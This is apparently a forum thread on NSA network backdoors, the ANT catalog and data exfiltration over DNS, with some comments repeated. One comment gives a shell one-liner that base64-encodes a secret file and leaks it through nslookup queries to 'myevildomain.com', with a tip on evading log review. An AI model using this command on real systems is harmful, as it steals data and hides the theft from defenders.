If the cheat codes were along the lines of "as long as they're using anyone's routers but Huawei's" they would not even require interception and customisation.
I wish I understood it better, because it's a real technique that the NSA uses, as far as I know. And I agree that it seems like it shouldn't be that simple.
Here's one I do understand: Suppose you want to exfiltrate some data out of a network without raising alarms. One way to do it is to set up a DNS server. Basically, you use DNS itself as a communication method, not merely a lookup table.
I've never actually used it, but it always seemed a cool idea. Almost no one blocks DNS, which means you can send data from anywhere in the world in a very unexpected way. You'd of course want to keep the transmission size reasonable (perhaps 5GB of DNS traffic might raise some eyebrows) but any system that you can `nslookup foo.com 8.8.8.8` on, you'd be able to `nslookup foo.com <your special server>` on. So this technique works in almost every case, except extremely monitored systems that only allow outgoing connections to a specific set of restricted IP addresses.
But for the special network protocol that the NSA uses to access backdoored NICs, I forget why it works, since the packet would need to pass through many routers along the way. In fact, I feel like I'm misremembering. Most target computers are behind routers, so it really doesn't make sense. Maybe it's a technique used against routers themselves. All I remember is that the NSA has some type of "signals we can send which normal networking tooling doesn't detect at all," along with a dose of "we know Iran just ordered some new servers, so we intercepted the servers and installed a backdoor." (The latter is called TAO: https://en.wikipedia.org/wiki/Tailored_Access_Operations)
They definitely do something with NICs though. The ANT document (https://en.wikipedia.org/wiki/NSA_ANT_catalog#Capabilities_l...) shows "COTTONMOUTH-III is a stacked Ethernet and USB plug costing approximately $1.25M for 50 units." Must be one hell of a plug.
https://en.wikipedia.org/wiki/NSA_ANT_catalog#/media/File:NS... is also pretty neat. It's a USB airgap bridge, i.e. janitor walks up and plugs it in to the target device. I wonder what the range on stuff like that is... Seems like you'd have to be sitting outside in a van or something, which is rather hard to do if your target is a nuclear enrichment facility (stuxnet).
Extremely monitored systems should probably communicate by tape, or cdrom, or similar write-mostly data diode medium. I've heard the US launch network updated mostly via paper tape for a long time. Today it occurred to me that people could, in principle, hand verify that two short paper tapes were identical, without needing to trust the integrity of any technological black boxes.
you'd be able to `nslookup foo.com <your special server>` on
You don’t need to tell nslookup to use a special server. If you control the SOA for your own domain, the normal DNS server will happily exfiltrate your data for you.
Yup - about 8 years ago or so, I built a TCP-over-DNS tunnel that smuggled data in DNS TXT records generated by a DNS server I ran on my colocated rack to allow me to surf the wider web when my laptop was connected to Wi-Fi captive portals.
The technique worked well for portals that allowed arbitrary DNS-over-UDP as well as portals that had their own exclusive DNS - provided that those portals worked by redirecting all IP traffic (i.e. they didn't fake DNS results).
It was slow though... I think I maxxed-out at around 8KBps (~64kbps) - barely enough for basic email functionality and text-only web-surfing.
Yup - about 8 years ago or so, I built a TCP-over-DNS tunnel that smuggled data in DNS TXT records generated by a DNS server
It's even easier that if you just want to sneak a relatively small file out.
for n in $(base64 mysecretfile|sed 's/.\{63\}/&\n/g'); do nslookup $n.myevildomain.com; done
Then get the file out of your evil DNS server logs at the other end. Of course this depends on how much DNS logging the local site is doing and if anyone is paying attention to those logs, but a few random sleeps should help there.
§ 5707 (c)(2): "the implications of [5G] global and regional adoption on
the cyber and espionage threat to the United States, the
interests of the United States, and the cyber and collection
capabilities of the United States;"
Here's one I do understand: Suppose you want to exfiltrate some data out of a network without raising alarms. One way to do it is to set up a DNS server. Basically, you use DNS itself as a communication method, not merely a lookup table.
I've never actually used it, but it always seemed a cool idea. Almost no one blocks DNS, which means you can send data from anywhere in the world in a very unexpected way. You'd of course want to keep the transmission size reasonable (perhaps 5GB of DNS traffic might raise some eyebrows) but any system that you can `nslookup foo.com 8.8.8.8` on, you'd be able to `nslookup foo.com <your special server>` on. So this technique works in almost every case, except extremely monitored systems that only allow outgoing connections to a specific set of restricted IP addresses.
But for the special network protocol that the NSA uses to access backdoored NICs, I forget why it works, since the packet would need to pass through many routers along the way. In fact, I feel like I'm misremembering. Most target computers are behind routers, so it really doesn't make sense. Maybe it's a technique used against routers themselves. All I remember is that the NSA has some type of "signals we can send which normal networking tooling doesn't detect at all," along with a dose of "we know Iran just ordered some new servers, so we intercepted the servers and installed a backdoor." (The latter is called TAO: https://en.wikipedia.org/wiki/Tailored_Access_Operations)
They definitely do something with NICs though. The ANT document (https://en.wikipedia.org/wiki/NSA_ANT_catalog#Capabilities_l...) shows "COTTONMOUTH-III is a stacked Ethernet and USB plug costing approximately $1.25M for 50 units." Must be one hell of a plug.
https://en.wikipedia.org/wiki/NSA_ANT_catalog#/media/File:NS... is also pretty neat. It's a USB airgap bridge, i.e. janitor walks up and plugs it in to the target device. I wonder what the range on stuff like that is... Seems like you'd have to be sitting outside in a van or something, which is rather hard to do if your target is a nuclear enrichment facility (stuxnet).